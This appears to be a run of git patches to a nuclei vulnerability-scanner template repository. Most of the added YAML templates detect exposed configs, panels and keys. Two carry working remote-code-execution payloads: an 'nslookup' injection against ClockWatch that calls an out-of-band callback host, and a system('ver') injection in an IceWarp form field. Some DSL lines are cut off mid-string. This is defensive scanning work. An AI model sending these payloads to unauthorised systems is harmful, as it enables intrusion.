+1,48 @@ +id: git-config + +info: + name: Git Config Disclosure + author: pdteam,pikpikcu,Mah3Sec_ + severity: medium + description: Searches for the pattern /.git/config and log file on passed URLs. + tags: config,git,exposure + +requests: + - raw: + - | + GET /.git/config HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Content-Type: application/x-www-form-urlencoded + Content-Length: 1 + Connection: close + + - | + GET /.git/logs/HEAD HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Content-Type: application/x-www-form-urlencoded + Content-Length: 1 + Connection: close + + matchers-condition: and + matchers: + - type: word + words: + - "[core]" + - "root" + condition: or + + - type: dsl + dsl: + - "!contains(tolower(body), '") == false' From a722b9fff6ee3d00a4bd2c3228ab2d8ff1d4eef7 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Thu, 8 Jul 2021 13:18:31 +0900 Subject: [PATCH 0349/4083] Create clockwatch-enterprise-rce.yaml Signed-off-by: GwanYeong Kim --- .../other/clockwatch-enterprise-rce.yaml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 vulnerabilities/other/clockwatch-enterprise-rce.yaml diff --git a/vulnerabilities/other/clockwatch-enterprise-rce.yaml b/vulnerabilities/other/clockwatch-enterprise-rce.yaml new file mode 100644 index 0000000000..24141ad3f7 --- /dev/null +++ b/vulnerabilities/other/clockwatch-enterprise-rce.yaml @@ -0,0 +1,22 @@ +id: clockwatch-enterprise-rce + +info: + name: ClockWatch Enterprise RCE + author: gy741 + severity: critical + tags: clockwatch,rce + reference: https://blog.grimm-co.com/2021/07/old-dog-same-tricks.html + +network: + - inputs: + - data: "C+nslookup {{interactsh-url}}" + + host: + - "{{Hostname}}" + - "{{Hostname}}:1001" + + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" From 7695526e13a07c847254babc2c3e433e3beae64a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 8 Jul 2021 14:00:01 +0530 Subject: [PATCH 0350/4083] Update clockwatch-enterprise-rce.yaml --- vulnerabilities/other/clockwatch-enterprise-rce.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/other/clockwatch-enterprise-rce.yaml b/vulnerabilities/other/clockwatch-enterprise-rce.yaml index 24141ad3f7..726b11cc46 100644 --- a/vulnerabilities/other/clockwatch-enterprise-rce.yaml +++ b/vulnerabilities/other/clockwatch-enterprise-rce.yaml @@ -14,9 +14,12 @@ network: host: - "{{Hostname}}" - "{{Hostname}}:1001" - + matchers-condition: or matchers: - type: word part: interactsh_protocol words: - "dns" + - type: word + words: + - "OK-C" From 6e6d383b6ccb63bab2cf7b1d66a83afa81247fb8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 8 Jul 2021 14:00:27 +0530 Subject: [PATCH 0351/4083] Update clockwatch-enterprise-rce.yaml --- vulnerabilities/other/clockwatch-enterprise-rce.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/clockwatch-enterprise-rce.yaml b/vulnerabilities/other/clockwatch-enterprise-rce.yaml index 726b11cc46..b21d67a56d 100644 --- a/vulnerabilities/other/clockwatch-enterprise-rce.yaml +++ b/vulnerabilities/other/clockwatch-enterprise-rce.yaml @@ -4,7 +4,7 @@ info: name: ClockWatch Enterprise RCE author: gy741 severity: critical - tags: clockwatch,rce + tags: clockwatch,rce,network reference: https://blog.grimm-co.com/2021/07/old-dog-same-tricks.html network: From 038cb8a63effc24ac6db357e5a0c66ca3eb097f6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 8 Jul 2021 08:31:55 +0000 Subject: [PATCH 0352/4083] Auto Update README [Thu Jul 8 08:31:55 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index c5cdbf0c26..498dfc750a 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 383 | vulnerabilities | 210 | exposed-panels | 188 | +| cves | 383 | vulnerabilities | 211 | exposed-panels | 188 | | takeovers | 69 | exposures | 110 | technologies | 112 | | misconfiguration | 74 | workflows | 32 | miscellaneous | 27 | | default-logins | 36 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**126 directories, 1441 files**. +**126 directories, 1442 files**. From 808712f772204a474390a87a2f442dafae0d6b8b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 8 Jul 2021 14:20:18 +0530 Subject: [PATCH 0353/4083] Update clockwatch-enterprise-rce.yaml --- vulnerabilities/other/clockwatch-enterprise-rce.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/clockwatch-enterprise-rce.yaml b/vulnerabilities/other/clockwatch-enterprise-rce.yaml index b21d67a56d..f3fd22042e 100644 --- a/vulnerabilities/other/clockwatch-enterprise-rce.yaml +++ b/vulnerabilities/other/clockwatch-enterprise-rce.yaml @@ -14,7 +14,7 @@ network: host: - "{{Hostname}}" - "{{Hostname}}:1001" - matchers-condition: or + matchers-condition: and matchers: - type: word part: interactsh_protocol From 491b6f8e2bad26497524858307edae105445c03c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 8 Jul 2021 14:41:02 +0530 Subject: [PATCH 0354/4083] Update CVE-2018-2392.yaml --- cves/2018/CVE-2018-2392.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-2392.yaml b/cves/2018/CVE-2018-2392.yaml index 906f3533b6..23b40cee1b 100644 --- a/cves/2018/CVE-2018-2392.yaml +++ b/cves/2018/CVE-2018-2392.yaml @@ -4,7 +4,7 @@ info: name: SAP Internet Graphics Server (IGS) XML External Entity author: _generic_human_ severity: high - tags: cve,sap,igs,xxe,xmlchart + tags: cve,cve2018,sap,igs,xxe,xmlchart description: | SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53 has two XXE vulnerabilities within the XMLCHART page - CVE-2018-2392 and CVE-2018-2393. These vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when submitting a POST request to the XMLCHART page to generate a new chart. reference: From 4326841cb4321e7fe1cf6d3b821818dcc6fbeb2e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 8 Jul 2021 14:43:40 +0530 Subject: [PATCH 0355/4083] Update sap-igs-detect.yaml --- technologies/sap-igs-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/sap-igs-detect.yaml b/technologies/sap-igs-detect.yaml index e4a882b009..bab13679aa 100644 --- a/technologies/sap-igs-detect.yaml +++ b/technologies/sap-igs-detect.yaml @@ -5,7 +5,7 @@ info: author: _generic_human_ description: Detection of SAP Internet Graphics Server (IGS) severity: info - tags: sap,webserver,igs + tags: sap,tech,igs requests: - method: GET From 0f34426f9f8c89314a639da630447372c0ec7a5c Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 8 Jul 2021 18:53:39 +0530 Subject: [PATCH 0356/4083] Update template-validate.yml --- .github/workflows/template-validate.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index bb2001f22c..8e3dd89214 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -26,7 +26,7 @@ jobs: env: GO111MODULE: on run: | - go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei + go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@dev shell: bash - name: Template Validation From 91d481f5f7ff4638dd1d82189ee7fdf545355460 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 8 Jul 2021 18:55:17 +0530 Subject: [PATCH 0357/4083] Update template-validate.yml --- .github/workflows/template-validate.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index 8e3dd89214..3c8b7221ed 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -31,5 +31,5 @@ jobs: - name: Template Validation run: | - nuclei -validate -t ~/nuclei-templates/ + nuclei -validate -t . shell: bash \ No newline at end of file From 2c8ff1ad2c23c378e95e82d56e4da6482e804dcd Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 8 Jul 2021 18:58:02 +0530 Subject: [PATCH 0358/4083] Update template-validate.yml --- .github/workflows/template-validate.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index 3c8b7221ed..dc67264c3f 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -31,5 +31,5 @@ jobs: - name: Template Validation run: | - nuclei -validate -t . + nuclei -validate -t . -exclude .pre-commit-config.yaml shell: bash \ No newline at end of file From 7342af6d5b3fa04c4e6cf3c2143da0fb3096ff89 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 9 Jul 2021 00:48:42 +0530 Subject: [PATCH 0359/4083] Create default-lucee-page.yaml --- technologies/default-lucee-page.yaml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 technologies/default-lucee-page.yaml diff --git a/technologies/default-lucee-page.yaml b/technologies/default-lucee-page.yaml new file mode 100644 index 0000000000..e18e273413 --- /dev/null +++ b/technologies/default-lucee-page.yaml @@ -0,0 +1,18 @@ +id: default-lucee-page + +info: + name: Lucee Default Page + author: dhiyaneshDk + severity: info + tags: tech,lucee + reference: https://www.shodan.io/search?query=http.title%3A%22Lucee%22 + +requests: + - method: GET + path: + - '{{BaseURL}}' + matchers: + - type: word + words: + - "Rapid web development with Lucee!" + part: body From 1e2e75599f52897ac947aee1d126e28b39f81197 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 9 Jul 2021 01:09:39 +0530 Subject: [PATCH 0360/4083] Create lucee-login.yaml --- exposed-panels/lucee-login.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposed-panels/lucee-login.yaml diff --git a/exposed-panels/lucee-login.yaml b/exposed-panels/lucee-login.yaml new file mode 100644 index 0000000000..6eb66727ff --- /dev/null +++ b/exposed-panels/lucee-login.yaml @@ -0,0 +1,24 @@ +id: lucee-login + +info: + name: Lucee Web/Server Administrator Login + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Lucee%22 + tags: panel,lucee + +requests: + - method: GET + path: + - '{{BaseURL}}/lucee/admin/web.cfm' + - '{{BaseURL}}/lucee/admin/server.cfm' + + matchers-condition: and + matchers: + - type: word + words: + - 'Login - Lucee Web Administrator' + - 'Login - Lucee Server Administrator' + - type: status + status: + - 200 From b3bd3b43554d0ffb2a4ccf49ad0cd6c23cfa590a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 9 Jul 2021 01:44:30 +0530 Subject: [PATCH 0361/4083] Create lucee-stack-trace.yaml --- exposures/logs/lucee-stack-trace.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposures/logs/lucee-stack-trace.yaml diff --git a/exposures/logs/lucee-stack-trace.yaml b/exposures/logs/lucee-stack-trace.yaml new file mode 100644 index 0000000000..6ad4786972 --- /dev/null +++ b/exposures/logs/lucee-stack-trace.yaml @@ -0,0 +1,25 @@ +id: lucee-stack-trace + +info: + name: Lucee Stack Trace Error + author: dhiyaneshDK + severity: low + reference: https://www.shodan.io/search?query=http.title%3A%22Lucee%22 + tags: lucee,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - 'lucee.runtime' + condition: or + + - type: status + status: + - 404 + - 200 From 98c925a413e5fe5f5784b284810474274eb727d1 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Thu, 8 Jul 2021 16:55:20 -0400 Subject: [PATCH 0362/4083] Create jira-unauthenticated-installed-gadgets.yaml --- ...ira-unauthenticated-installed-gadgets.yaml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 vulnerabilities/jira/jira-unauthenticated-installed-gadgets.yaml diff --git a/vulnerabilities/jira/jira-unauthenticated-installed-gadgets.yaml b/vulnerabilities/jira/jira-unauthenticated-installed-gadgets.yaml new file mode 100644 index 0000000000..2004a6ca1d --- /dev/null +++ b/vulnerabilities/jira/jira-unauthenticated-installed-gadgets.yaml @@ -0,0 +1,23 @@ +id: jira-unauthenticated-installed-gadgets + +info: + name: Jira Unauthenticated Installed gadgets + author: philippedelteil + severity: info + description: Some Jira instances allow to read the installed gadgets (sometimes it's also possible to read config xml file for some gadgets) + +requests: + - method: GET + path: + - "{{BaseURL}}/rest/config/1.0/directory" + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + words: + - 'jaxbDirectoryContents' + condition: or + - type: status + status: + - 200 From 97fe1deb380558a80c25b16e913403a894b5ba3d Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Thu, 8 Jul 2021 22:42:51 +0000 Subject: [PATCH 0363/4083] Create lucee-workflow.yaml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Depends on #1905 👍🏻 --- workflows/lucee-workflow.yaml | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 workflows/lucee-workflow.yaml diff --git a/workflows/lucee-workflow.yaml b/workflows/lucee-workflow.yaml new file mode 100644 index 0000000000..68772415a5 --- /dev/null +++ b/workflows/lucee-workflow.yaml @@ -0,0 +1,14 @@ +id: lucee-workflow + +info: + name: Lucee Detection Workflow + author: geeknik + description: A simple workflow that runs all Lucee related nuclei templates on given target. + tags: workflow + +workflows: + - template: technologies/lucee-detect.yaml + subtemplates: + - template: technologies/default-lucee-page.yaml + - template: exposed-panels/lucee-login.yaml + - template: exposures/logs/lucee-stack-trace.yaml From 2210cce2a85544922c1445ac62b5b7fb64317505 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Fri, 9 Jul 2021 09:27:05 +0900 Subject: [PATCH 0364/4083] Create stem-audio-table-private-keys.yaml Signed-off-by: GwanYeong Kim --- iot/stem-audio-table-private-keys.yaml | 30 ++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 iot/stem-audio-table-private-keys.yaml diff --git a/iot/stem-audio-table-private-keys.yaml b/iot/stem-audio-table-private-keys.yaml new file mode 100644 index 0000000000..02cade8a05 --- /dev/null +++ b/iot/stem-audio-table-private-keys.yaml @@ -0,0 +1,30 @@ +id: stem-audio-table-private-keys + +info: + name: Detect Private Key on STEM Audio Table + author: gy741 + severity: high + reference: https://blog.grimm-co.com/2021/06/the-walls-have-ears.html + tags: stem,config,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/privatekey.pem" + + matchers-condition: and + matchers: + - type: word + words: + - "BEGIN RSA PRIVATE KEY" + condition: or + + - type: status + status: + - 200 + + - type: dsl + dsl: + - '!contains(body_2, " Date: Fri, 9 Jul 2021 08:24:09 +0530 Subject: [PATCH 0365/4083] Update lucee-detect.yaml --- technologies/lucee-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/technologies/lucee-detect.yaml b/technologies/lucee-detect.yaml index e4cd2663f7..ae7e0c7860 100644 --- a/technologies/lucee-detect.yaml +++ b/technologies/lucee-detect.yaml @@ -4,6 +4,7 @@ info: author: geeknik description: Lucee Server is a dynamic, Java based (JSR-223), tag and scripting language used for rapid web application development -- https://github.com/lucee/Lucee/ severity: info + tags: tech,lucee requests: - method: GET From bb22190551a1c9a55100a790ae9070ec72dc8730 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 9 Jul 2021 08:30:20 +0530 Subject: [PATCH 0366/4083] Update default-lucee-page.yaml --- technologies/default-lucee-page.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/technologies/default-lucee-page.yaml b/technologies/default-lucee-page.yaml index e18e273413..7376d5d6a7 100644 --- a/technologies/default-lucee-page.yaml +++ b/technologies/default-lucee-page.yaml @@ -16,3 +16,9 @@ requests: words: - "Rapid web development with Lucee!" part: body + extractors: + - type: regex + part: body + group: 1 + regex: + - "Lucee ([0-9.\-A-Z]+) on your system" From 5f7b3bb8101c4dcc17ddb994f3fcf911b7196ef6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 9 Jul 2021 08:36:52 +0530 Subject: [PATCH 0367/4083] Update default-lucee-page.yaml --- technologies/default-lucee-page.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/default-lucee-page.yaml b/technologies/default-lucee-page.yaml index 7376d5d6a7..9f4f56c0b1 100644 --- a/technologies/default-lucee-page.yaml +++ b/technologies/default-lucee-page.yaml @@ -21,4 +21,4 @@ requests: part: body group: 1 regex: - - "Lucee ([0-9.\-A-Z]+) on your system" + - "Lucee ([0-9.-A-Z]+) on your system" From 0b47dc1189cdac0827740412c0026ba4757d8bc1 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 9 Jul 2021 08:43:28 +0530 Subject: [PATCH 0368/4083] Update default-lucee-page.yaml --- technologies/default-lucee-page.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/default-lucee-page.yaml b/technologies/default-lucee-page.yaml index 9f4f56c0b1..5fbd0c0a4d 100644 --- a/technologies/default-lucee-page.yaml +++ b/technologies/default-lucee-page.yaml @@ -21,4 +21,4 @@ requests: part: body group: 1 regex: - - "Lucee ([0-9.-A-Z]+) on your system" + - "Lucee ([0-9.\\-A-Z]+) on your system" From a1782c0380f71b5d77df7f6dae45698332b1a71e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 9 Jul 2021 08:45:33 +0530 Subject: [PATCH 0369/4083] Update lucee-login.yaml --- exposed-panels/lucee-login.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposed-panels/lucee-login.yaml b/exposed-panels/lucee-login.yaml index 6eb66727ff..ebbb7bba20 100644 --- a/exposed-panels/lucee-login.yaml +++ b/exposed-panels/lucee-login.yaml @@ -19,6 +19,7 @@ requests: words: - 'Login - Lucee Web Administrator' - 'Login - Lucee Server Administrator' + condition: or - type: status status: - 200 From 3737662cf21b68702257a4c7ccd04148ffe677a3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 9 Jul 2021 08:49:53 +0530 Subject: [PATCH 0370/4083] Update lucee-login.yaml --- exposed-panels/lucee-login.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/exposed-panels/lucee-login.yaml b/exposed-panels/lucee-login.yaml index ebbb7bba20..6eb66727ff 100644 --- a/exposed-panels/lucee-login.yaml +++ b/exposed-panels/lucee-login.yaml @@ -19,7 +19,6 @@ requests: words: - 'Login - Lucee Web Administrator' - 'Login - Lucee Server Administrator' - condition: or - type: status status: - 200 From 64b36e181b82c8dc39b752e6be07a471412e0759 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 9 Jul 2021 09:45:38 +0530 Subject: [PATCH 0371/4083] Update lucee-stack-trace.yaml --- exposures/logs/lucee-stack-trace.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/logs/lucee-stack-trace.yaml b/exposures/logs/lucee-stack-trace.yaml index 6ad4786972..30b0de0c5e 100644 --- a/exposures/logs/lucee-stack-trace.yaml +++ b/exposures/logs/lucee-stack-trace.yaml @@ -17,9 +17,9 @@ requests: - type: word words: - 'lucee.runtime' - condition: or - type: status status: - 404 - 200 + condition: or From 124b96050390a34a6d4022e1f58c71e16cc70fde Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 9 Jul 2021 09:50:42 +0530 Subject: [PATCH 0372/4083] Update lucee-stack-trace.yaml --- exposures/logs/lucee-stack-trace.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/logs/lucee-stack-trace.yaml b/exposures/logs/lucee-stack-trace.yaml index 30b0de0c5e..a3e47132eb 100644 --- a/exposures/logs/lucee-stack-trace.yaml +++ b/exposures/logs/lucee-stack-trace.yaml @@ -20,6 +20,6 @@ requests: - type: status status: - - 404 + - 500 - 200 condition: or From ac4176e9b481ed5e614e56b706b45196f30f1cc9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 9 Jul 2021 04:24:47 +0000 Subject: [PATCH 0373/4083] Auto Update README [Fri Jul 9 04:24:47 UTC 2021] :robot: --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 498dfc750a..9e39161dd3 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 383 | vulnerabilities | 211 | exposed-panels | 188 | -| takeovers | 69 | exposures | 110 | technologies | 112 | +| cves | 383 | vulnerabilities | 211 | exposed-panels | 189 | +| takeovers | 69 | exposures | 111 | technologies | 113 | | misconfiguration | 74 | workflows | 32 | miscellaneous | 27 | | default-logins | 36 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**126 directories, 1442 files**. +**126 directories, 1445 files**. From ef74a354cacc4093cd8bbf2257a0fe8b0e84a70a Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Fri, 9 Jul 2021 13:52:28 +0900 Subject: [PATCH 0374/4083] Create icewarp-webclient-rce.yaml Signed-off-by: GwanYeong Kim --- .../other/icewarp-webclient-rce.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 vulnerabilities/other/icewarp-webclient-rce.yaml diff --git a/vulnerabilities/other/icewarp-webclient-rce.yaml b/vulnerabilities/other/icewarp-webclient-rce.yaml new file mode 100644 index 0000000000..192fc314c3 --- /dev/null +++ b/vulnerabilities/other/icewarp-webclient-rce.yaml @@ -0,0 +1,28 @@ +id: icewarp-webclient-rce + +info: + name: IceWarp WebClient RCE + author: gy741 + severity: critical + tags: icewarp,rce + reference: https://www.pwnwiki.org/index.php?title=IceWarp_WebClient_basic_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E + +requests: + - raw: + - | + POST /webmail/basic/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + _dlg[captcha][target]=system(\'ver\')\ + + matchers-condition: and + matchers: + - type: word + words: + - "Microsoft Windows" + part: body + + - type: status + status: + - 302 From 5a041c66a08b48b58f2cca6ce8af0f99af394194 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 9 Jul 2021 04:54:37 +0000 Subject: [PATCH 0375/4083] Auto Update README [Fri Jul 9 04:54:37 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 9e39161dd3..c4ed53116d 100644 --- a/README.md +++ b/README.md @@ -40,11 +40,11 @@ An overview of the nuclei template directory including number of templates assoc | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 383 | vulnerabilities | 211 | exposed-panels | 189 | | takeovers | 69 | exposures | 111 | technologies | 113 | -| misconfiguration | 74 | workflows | 32 | miscellaneous | 27 | +| misconfiguration | 74 | workflows | 33 | miscellaneous | 27 | | default-logins | 36 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**126 directories, 1445 files**. +**126 directories, 1446 files**. From a77a3db701d911c5626c4ade6ac4e63190c2b4b3 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Fri, 9 Jul 2021 06:23:28 +0000 Subject: [PATCH 0376/4083] Update symfony-database-config.yaml Fixes #1910 --- exposures/configs/symfony-database-config.yaml | 13 +++++++++++-- 1 file changed, 11 insertions(+), 2 deletions(-) diff --git a/exposures/configs/symfony-database-config.yaml b/exposures/configs/symfony-database-config.yaml index 0ff2466aa1..90c3d9f5de 100644 --- a/exposures/configs/symfony-database-config.yaml +++ b/exposures/configs/symfony-database-config.yaml @@ -2,7 +2,7 @@ id: symfony-database-config info: name: Symfony Database Configuration Exposure - author: pdteam + author: pdteam,geeknik severity: high tags: config,exposure @@ -10,10 +10,19 @@ requests: - method: GET path: - "{{BaseURL}}/config/databases.yml" + matchers-condition: and matchers: + - type: word + part: header + words: + - "text/html" + negative: true + - type: status + status: + - 200 - type: word words: - "class:" - "param:" condition: and - part: body \ No newline at end of file + part: body From b5d3bae2bc1724bdc31ef27c922453a316eaf6a6 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Fri, 9 Jul 2021 16:44:28 +0900 Subject: [PATCH 0377/4083] Update favicon-detection.yaml Signed-off-by: GwanYeong Kim --- technologies/favicon-detection.yaml | 8 ++++++++ technologies/sonicwall-email-security-detect.yaml | 2 +- 2 files changed, 9 insertions(+), 1 deletion(-) diff --git a/technologies/favicon-detection.yaml b/technologies/favicon-detection.yaml index 624f917a05..1a180e71b7 100644 --- a/technologies/favicon-detection.yaml +++ b/technologies/favicon-detection.yaml @@ -2024,3 +2024,11 @@ requests: name: "One Identity Password Manager" dsl: - "status_code==200 && (\"983384876\" == mmh3(base64_py(body)))" + - type: dsl + name: "Kaseya" + dsl: + - "status_code==200 && (\"-1445519482\" == mmh3(base64_py(body)))" + - type: dsl + name: "OpenSNS" + dsl: + - "status_code==200 && (\"1167011145\" == mmh3(base64_py(body)))" diff --git a/technologies/sonicwall-email-security-detect.yaml b/technologies/sonicwall-email-security-detect.yaml index 5f8f24e3d8..72a0f40847 100644 --- a/technologies/sonicwall-email-security-detect.yaml +++ b/technologies/sonicwall-email-security-detect.yaml @@ -1,7 +1,7 @@ id: sonicwall-email-security-detect info: - name: SonicWall Email Security Detection + name: SonicWall Email Security Detection author: gy741 severity: info reference: | From 899f1e732bb160adb8c178aa54257938980da308 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 9 Jul 2021 22:50:20 +0530 Subject: [PATCH 0378/4083] Added exposed-gitignore --- exposures/configs/exposed-gitignore.yaml | 31 ++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 exposures/configs/exposed-gitignore.yaml diff --git a/exposures/configs/exposed-gitignore.yaml b/exposures/configs/exposed-gitignore.yaml new file mode 100644 index 0000000000..4584811b32 --- /dev/null +++ b/exposures/configs/exposed-gitignore.yaml @@ -0,0 +1,31 @@ +id: exposed-gitignore + +info: + name: Exposed Gitignore + author: TheZakMan + severity: info + tags: config,git,exposure + reference: | + - https://twitter.com/pratiky9967/status/1230001391701086208 + - https://www.tenable.com/plugins/was/98595 + +requests: + - method: GET + path: + - "{{BaseURL}}/.gitignore" + - "{{BaseURL}}/assets/.gitignore" + - "{{BaseURL}}/includes/.gitignore" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: dsl + dsl: + - '!contains(tolower(body), " Date: Fri, 9 Jul 2021 17:23:03 +0000 Subject: [PATCH 0379/4083] Auto Update README [Fri Jul 9 17:23:03 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index c4ed53116d..694bb0abba 100644 --- a/README.md +++ b/README.md @@ -39,12 +39,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 383 | vulnerabilities | 211 | exposed-panels | 189 | -| takeovers | 69 | exposures | 111 | technologies | 113 | +| takeovers | 69 | exposures | 112 | technologies | 113 | | misconfiguration | 74 | workflows | 33 | miscellaneous | 27 | | default-logins | 36 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**126 directories, 1446 files**. +**126 directories, 1447 files**. From ce7531e6546d2e05e49bbbbac4f52d4c65fe4f96 Mon Sep 17 00:00:00 2001 From: Gregory Boddin Date: Fri, 9 Jul 2021 21:06:45 +0200 Subject: [PATCH 0380/4083] Added open-mjpg-streamer --- iot/open-mjpg-streamer.yml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100755 iot/open-mjpg-streamer.yml diff --git a/iot/open-mjpg-streamer.yml b/iot/open-mjpg-streamer.yml new file mode 100755 index 0000000000..fc0ed0eefd --- /dev/null +++ b/iot/open-mjpg-streamer.yml @@ -0,0 +1,23 @@ +id: open-mjpg-streamer + +info: + name: open-mjpg-streamer + author: gboddin + severity: medium + reference: https://github.com/jacksonliam/mjpg-streamer + tags: iot,webcam + description: Open mjpg-streamer service sharing webcam/camera feed + +requests: + - method: GET + path: + - "{{BaseURL}}/?action=snapshot" + matchers-condition: and + matchers: + - type: word + words: + - 'JFIF' + part: body + - type: status + status: + - 200 From a35c34127ca83075918c506590c8419f35e643d0 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 10 Jul 2021 